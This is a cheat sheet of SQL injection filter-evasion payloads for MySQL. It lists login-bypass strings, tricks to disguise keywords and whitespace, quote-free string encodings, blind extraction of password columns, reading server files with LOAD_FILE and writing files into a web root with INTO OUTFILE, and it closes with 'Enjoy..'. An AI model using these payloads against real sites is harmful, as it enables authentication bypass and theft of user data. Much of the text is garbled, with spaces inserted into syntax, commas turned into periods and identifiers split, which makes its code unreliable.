SQLi filter evasion cheat sheet (MySQL)
Basic filter
Comments
'Or 1 = 1 #
'Or 1 = 1 -
'Or 1 = 1 / * (MySQL <5.1)
'Or 1 = 1;
'Or 1 = 1 union select 1.2 as `
'Or # newline
1 = '1
'Or--newline
1 = '1
'/ *! 50000or * / 1 = '1
'/ *! Hay * / 1 = '1
Prefixes
+ - ~!
'Or - +2 = -!!! '2
Operators
^, =,! =,%, /, *, &, &&, | |, | |,, >>, <=, <=,,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, Least, Greatest , CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL
Whitespaces
% 20% 09% 0a% 0B% 0c% 0d% a0 / ** /
'Or + (1) sounds / ** / like "1" -% a0-
'Union (select (1), tabe_name, (3) from `information_s Chema`. `Tables`) #
Strings with quotes
SELECT 'a'
SELECT "a"
SELECT n'a '
SELECT b'1100001 '
SELECT _binary'1100001 '
SELECT x'61 '
Strings without quotes
'Abc' = 0 × 616263
Aliases
select pass as alias from users
select pass aliasalias from users
select pass `alias alias` from users
Typecasting
'Or true = '1 # or 1 = 1
'Or round (pi (), 1) + true + true = version () # or 3.1 +1 +1 = 5.1
'Or '1 # or true
Compare operator typecasting
select * from users where 'a' = 'b' = 'c'
select * from users where ('a' = 'b') = 'c'
select * from users where (false) = 'c'
select * from users where (0) = 'c'
select * from users where (0) = 0
select * from users where true
select * from users
Authentication bypass '='
select * from users where name = "="
select * from users where false = "
select * from users where 0 = 0
select * from users where true
select * from users
Authentication bypass '-'
select * from users where name = "-"
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users
Function filter
General function filtering
ascii (97)
LOAD_FILE / * foo * / (0 × 616 263)
Strings with functions
'Abc' = unhex (616 263)
'Abc' = char (97,98,99)
hex ('a') = 61
ascii ('a') = 97
ord ('a') = 97
'ABC' = concat (conv (10,10,36), conv (11,10,36), conv (12,10,36))
Strings extracted from gadgets
collation (\ N) / / binary
collation (user ()) / / utf8_general_ci
@ @ Time_format / /% H:% i:% s
@ @ Binlog_format / / MIXED
@ @ Version_comment / / MySQL Community Server (GPL)
dayname (from_days (401)) / / Monday
dayname (from_days (403)) / / Wednesday
monthname (from_days (690)) / / November
monthname (from_unixtime (1)) / / January
collation (convert ((1) using / ** / koi8r)) / / koi8r_general_ci
(Select (collation_name) from (information_schema.col lations) where (id) = 2) / / latin2_czech_cs
Special characters extracted from gadgets
AES_ENCRYPT (1.12) / / 4CH ± {? "^ c × HeEEa
DES_ENCRYPT (1,2) / /, / iOk
@ @ Ft_boolean_syntax / / + -> <() ~ *: "" & |
@ @ DATE_FORMAT / /% Y-% m-% d
@ @ Innodb_log_group_home_dir / /. \
Integer representations
false: 0
true: 1
true + true: 2
floor (pi ()): 3
ceil (pi ()): 4
floor (version ()): 5
ceil (version ()): 6
ceil (pi () + pi ()): 7
floor (version () + pi ()): 8
floor (pi () * pi ()): 9
ceil (pi () * pi ()): 10
concat (true, true): 11
ceil (pi () * pi ()) + true: 11
ceil (pi () pi () + version ()): 12
floor (pi () * pi () + pi ()): 13
ceil (pi () * pi () + pi ()): 14
ceil (pi () * pi () + version ()): 15
floor (pi () * version ()): 16
ceil (pi () * version ()): 17
ceil (pi () * version ()) + true: 18
floor ((pi () + pi ()) * pi ()): 19
ceil ((pi () + pi ()) * pi ()): 20
ceil (ceil (pi ()) * version ()): 21
concat (true + true, true): 21
ceil (pi () * ceil (pi () + pi ())): 22
ceil ((pi () + ceil (pi ())) * pi ()): 23
ceil (pi ()) * ceil (version ()): 24
floor (pi () * (version () + pi ())): 25
floor (version () * version ()): 26
ceil (version () * version ()): 27
ceil (pi () * pi () * pi () pi ()): 28
floor (pi () * pi () * floor (pi ())): 29
ceil (pi () * pi () * floor (pi ())): 30
concat (floor (pi ()), false): 30
floor (pi () * pi () * pi ()): 31
ceil (pi () * pi () * pi ()): 32
ceil (pi () * pi () * pi ()) + true: 33
ceil (pow (pi () pi ())-pi ()): 34
ceil (pi () * pi () * pi () + pi ()): 35
floor (pow (pi () pi ())): 36
@ @ New: 0
@ @ Log_bin: 1
! Pi (): 0
!! Pi (): 1
true-~ true: 3
log (-cos (pi ())): 0
-Cos (pi ()): 1
coercibility (user ()): 3
coercibility (now ()): 4
minute (now ())
hour (now ())
(NOW ())
week (now ())
month (now ())
year (now ())
quarter (now ())
year (@ @ timestamp)
CRC32 (true)
Extract substrings
substr ('abc', 1,1) = 'a'
substr ('abc' from 1 for 1) = 'a'
substring ('abc', 1,1) = 'a'
substring ('abc' from 1 for 1) = 'a'
mid ('abc', 1,1) = 'a'
mid ('abc' from 1 for 1) = 'a'
lpad ('abc', 1, space (1)) = 'a'
RPAD ('abc', 1, space (1)) = 'a'
left ('abc', 1) = 'a'
reverse (right (reverse ('abc'), 1)) = 'a'
insert (insert ('abc', 1,0, space (0)), 2,222, space (0)) = 'a'
space (0) = trim (version () from (version ()))
Search substrings
locate ('a', 'abc')
position ('a', 'abc')
position ('a' IN 'abc')
INSTR ('abc', 'a')
SUBSTRING_INDEX ('ab', 'b', 1)
Cut substrings
length (trim (leading 'a' FROM 'abc'))
length (replace ('abc', 'a', "))
Compare strings
strcmp ('a', 'a')
mod ('a', 'a')
find_in_set ('a', 'a')
field ('a', 'a')
count (concat ('a', 'a'))
String length
length ()
bit_length ()
char_length ()
octet_length ()
bit_count ()
String case
ucase
LCase
lower
upper
password ('a')! = password ('A')
OLD_PASSWORD ('a')! = OLD_PASSWORD ('A')
md5 ('a')! = md5 ('A')
sha ('a')! = sha ('A')
AES_ENCRYPT ('a')! = AES_ENCRYPT ('A')
DES_ENCRYPT ('a')! = DES_ENCRYPT ('A')
Keyword filter
Connected keyword filtering
(0) union (select (table_name), column_name, ...
0 / ** / union / *! 50000select * / table_name `foo` / ** / ...
0% a0union% a0select% 09group_concat (table_name) ....
0'union all select all `table_name` foo from `information_schema`. `Tables`
OR, AND
'| | 1 = '1
'&& 1 = '1
'='
'-'
OR, AND, UNION
'And (select pass from users limit 1) =' secret
OR, AND, UNION, LIMIT
'And (select pass from users where id = 1) =' a
OR, AND, UNION, LIMIT, WHERE
'And (select pass from users group by id having id = 1) =' a
OR, AND, UNION, LIMIT, WHERE, GROUP
'And length ((select pass from users having substr (pass, 1,1) =' a '))
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
'And (select substr (group_concat (pass), 1,1) from users) =' a
'And substr ((select max (pass) from users), 1,1) =' a
'And substr ((select max (replace (pass,' lastpw ', ")) from users), 1,1) =' a
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
'And substr (LOAD_FILE (' file '), locate (' DocumentRoo t ', (LOAD_FILE (' file '))) + length (the' ot DocumentRo '), 10) =' a
'= "Into outfile' / var / www / dump.txt
OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
'Procedure Analyse () #
'-If (name =' Admin ', 1,0) #
'-If (if (name =' Admin ', 1,0), if (substr (pass, 1,1) = a', 1,0), 0) #
Control flow
case 'a' when 'a' then 1 [else 0] end
case when 'a' = 'a' then 1 [else 0] end
if ('a' = 'a', 1.0)
IFNULL (NULLIF ('a', 'a'), 1)
Enjoy..
PROTOTYPE...